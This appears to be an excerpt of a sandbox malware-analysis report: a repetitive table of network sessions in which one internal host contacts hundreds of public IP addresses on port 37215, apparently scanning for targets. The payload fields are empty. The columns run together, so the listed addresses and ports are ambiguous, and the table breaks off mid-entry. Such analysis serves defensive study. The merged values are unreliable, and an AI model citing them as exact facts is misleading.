                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20139192.168.2.155551231.219.237.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20140192.168.2.155932694.139.63.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20141192.168.2.155030645.115.151.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20142192.168.2.1544278122.222.200.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20143192.168.2.1554350181.104.188.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20144192.168.2.1535974122.192.108.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20145192.168.2.154665694.79.7.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20146192.168.2.1536350164.161.127.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20147192.168.2.1556686157.141.164.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20148192.168.2.1550504122.162.182.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20149192.168.2.1555828156.159.153.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20150192.168.2.153568641.126.80.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20151192.168.2.155824494.187.1.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20152192.168.2.1559446122.244.143.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20153192.168.2.1548056197.237.232.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20154192.168.2.1533290106.244.158.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20155192.168.2.154454645.218.20.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20156192.168.2.1543742121.150.210.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20157192.168.2.1536124222.25.101.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20158192.168.2.155923845.7.24.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20159192.168.2.154665245.244.45.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20160192.168.2.155744037.241.197.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20161192.168.2.1542390222.219.192.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20162192.168.2.154618845.155.200.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20163192.168.2.154228694.190.119.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20164192.168.2.153992452.142.20.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20165192.168.2.1535202181.74.106.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20166192.168.2.1538676138.64.74.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20167192.168.2.154922094.72.31.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20168192.168.2.1553918197.67.83.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20169192.168.2.1559894122.185.179.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20170192.168.2.1541210206.118.245.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20171192.168.2.155552637.191.80.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20172192.168.2.1552464222.247.255.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20173192.168.2.1537778197.236.205.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20174192.168.2.1544982222.68.253.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20175192.168.2.1550858122.167.162.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20176192.168.2.1541292190.122.134.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20177192.168.2.154428234.126.173.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20178192.168.2.1543930197.99.191.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20179192.168.2.1548000197.110.213.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20180192.168.2.1555972157.125.222.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20181192.168.2.1536360156.21.151.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20182192.168.2.1543304121.78.152.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20183192.168.2.1540398185.140.44.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20184192.168.2.153972437.120.193.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20185192.168.2.1540800222.198.130.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20186192.168.2.1554712181.235.191.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20187192.168.2.1535088222.19.242.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20188192.168.2.1552538122.162.110.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20189192.168.2.1548176136.17.215.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20190192.168.2.1544574121.142.64.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20191192.168.2.1558442102.36.126.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20192192.168.2.1545680190.126.215.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20193192.168.2.1545584190.13.93.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20194192.168.2.1548718181.228.192.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20195192.168.2.1553798138.204.73.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20196192.168.2.1540668186.107.105.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20197192.168.2.1546736222.148.117.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20198192.168.2.1543178222.84.101.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20199192.168.2.154173631.242.238.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20200192.168.2.153686031.24.117.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20201192.168.2.1542036122.229.250.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20202192.168.2.1556586186.14.115.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20203192.168.2.1550612102.251.26.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20204192.168.2.153651845.232.96.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20205192.168.2.1559204190.210.41.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20206192.168.2.153346831.107.175.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20207192.168.2.1536758122.214.173.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20208192.168.2.1551054157.140.240.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20209192.168.2.154322645.158.11.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20210192.168.2.1547366183.134.124.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20211192.168.2.1544628157.144.56.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20212192.168.2.154224041.60.138.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20213192.168.2.1533166122.240.5.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20214192.168.2.154394037.224.248.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20215192.168.2.155832231.98.103.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20216192.168.2.155685437.75.119.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20217192.168.2.154956645.58.232.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20218192.168.2.1540784197.206.214.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20219192.168.2.154929694.51.217.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20220192.168.2.1539294122.47.205.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20221192.168.2.1540046138.75.84.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20222192.168.2.1538852197.126.251.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20223192.168.2.1555678138.125.205.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20224192.168.2.1535160121.155.102.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20225192.168.2.153737041.92.211.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20226192.168.2.1557642122.208.191.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20227192.168.2.1560044102.233.15.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20228192.168.2.155640645.77.191.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20229192.168.2.1533916197.164.251.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20230192.168.2.155128294.55.197.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20231192.168.2.1537910138.127.88.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20232192.168.2.1542144102.156.179.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20233192.168.2.1533930156.23.195.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20234192.168.2.155607294.200.229.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20235192.168.2.154405641.13.51.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20236192.168.2.1535478181.15.53.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20237192.168.2.1540346186.127.3.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20238192.168.2.1545494157.195.211.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20239192.168.2.1543088222.251.212.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20240192.168.2.1537910157.135.179.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20241192.168.2.155981494.200.119.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20242192.168.2.1543394102.251.115.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20243192.168.2.1533128121.147.212.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20244192.168.2.156000014.165.72.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20245192.168.2.155577441.29.181.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20246192.168.2.155163437.40.126.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20247192.168.2.1549662186.20.18.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20248192.168.2.155637294.167.140.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20249192.168.2.154097694.203.240.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20250192.168.2.154579031.234.66.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20251192.168.2.153452445.119.45.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20252192.168.2.1547508102.138.27.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20253192.168.2.1534896121.130.49.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20254192.168.2.1534392181.29.244.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20255192.168.2.1551304222.135.26.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20256192.168.2.1556788102.219.56.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20257192.168.2.1539492121.42.239.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20258192.168.2.1537930222.206.250.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20259192.168.2.1533496222.120.205.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20260192.168.2.1559262197.240.219.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20261192.168.2.1546296197.161.155.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20262192.168.2.1533734222.58.227.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20263192.168.2.1537290138.208.207.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20264192.168.2.1560042190.136.30.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20265192.168.2.1537894121.76.223.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20266192.168.2.1553736121.99.181.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20267192.168.2.1541816157.190.128.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20268192.168.2.153413245.48.241.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20269192.168.2.1534016102.63.249.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20270192.168.2.153973037.86.144.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20271192.168.2.1553418122.34.12.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20272192.168.2.1560036181.18.200.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20273192.168.2.1557376190.165.170.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20274192.168.2.1540688197.54.208.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20275192.168.2.1559682138.8.86.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20276192.168.2.154168241.57.12.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20277192.168.2.156083845.168.105.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20278192.168.2.1560544181.150.153.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20279192.168.2.1558034121.98.13.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20280192.168.2.155044273.7.247.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20281192.168.2.1557772204.204.176.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20282192.168.2.1533580181.185.132.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20283192.168.2.1544248138.249.119.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20284192.168.2.155224237.202.123.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20285192.168.2.1549092102.125.217.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20286192.168.2.1547610110.166.6.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20287192.168.2.1545248181.36.29.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20288192.168.2.1538672197.215.129.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20289192.168.2.1560530122.11.114.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20290192.168.2.1554820121.22.52.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20291192.168.2.1543834156.97.237.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20292192.168.2.1554196190.86.191.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20293192.168.2.1556758186.240.151.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20294192.168.2.1541116121.107.120.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20295192.168.2.155106041.44.120.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20296192.168.2.1555946121.125.196.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20297192.168.2.154259641.247.58.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20298192.168.2.1558642186.126.223.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20299192.168.2.1533134121.219.243.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20300192.168.2.153691837.237.240.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20301192.168.2.1535900222.159.68.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20302192.168.2.1553068102.136.157.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20303192.168.2.154265831.112.62.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20304192.168.2.1539626190.216.115.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20305192.168.2.1536498222.117.184.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20306192.168.2.1544814102.5.75.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20307192.168.2.1557126156.182.179.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20308192.168.2.1541018157.128.216.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20309192.168.2.1533628190.167.168.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20310192.168.2.1540824190.148.231.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20311192.168.2.1541590157.71.194.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20312192.168.2.1550862102.11.174.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20313192.168.2.1547632186.224.95.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20314192.168.2.154161631.90.220.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20315192.168.2.1552456186.207.187.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20316192.168.2.1541838138.56.176.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20317192.168.2.1552030186.43.192.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20318192.168.2.1558948190.120.253.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20319192.168.2.1548220181.97.80.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20320192.168.2.155979294.202.250.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20321192.168.2.1544708181.83.160.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20322192.168.2.1538230102.188.149.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20323192.168.2.155308894.117.39.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20324192.168.2.153497237.167.231.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20325192.168.2.1557624190.225.236.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20326192.168.2.1538946121.59.58.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20327192.168.2.1553434157.192.160.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20328192.168.2.1534840186.29.111.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20329192.168.2.1535200157.117.145.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20330192.168.2.1560788121.115.202.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20331192.168.2.155313225.209.144.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20332192.168.2.1543218181.166.209.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20333192.168.2.154558437.70.82.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20334192.168.2.155029837.124.139.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20335192.168.2.155645037.174.136.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20336192.168.2.1548248156.248.243.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20337192.168.2.153918831.124.22.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20338192.168.2.154000837.124.94.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20339192.168.2.155705637.178.104.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20340192.168.2.1555866157.115.117.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20341192.168.2.153847882.59.33.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20342192.168.2.1541572197.216.84.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20343192.168.2.153994231.46.197.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20344192.168.2.1556140122.142.59.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20345192.168.2.153736841.50.135.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20346192.168.2.153818437.52.59.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20347192.168.2.1546008121.24.142.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20348192.168.2.1539924181.233.12.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20349192.168.2.1536686181.147.152.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20350192.168.2.1535718190.83.252.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20351192.168.2.155856441.130.234.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20352192.168.2.1543534102.147.145.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20353192.168.2.1560148156.63.241.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20354192.168.2.154914041.45.175.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20355192.168.2.153378245.166.136.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20356192.168.2.1535042122.27.146.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
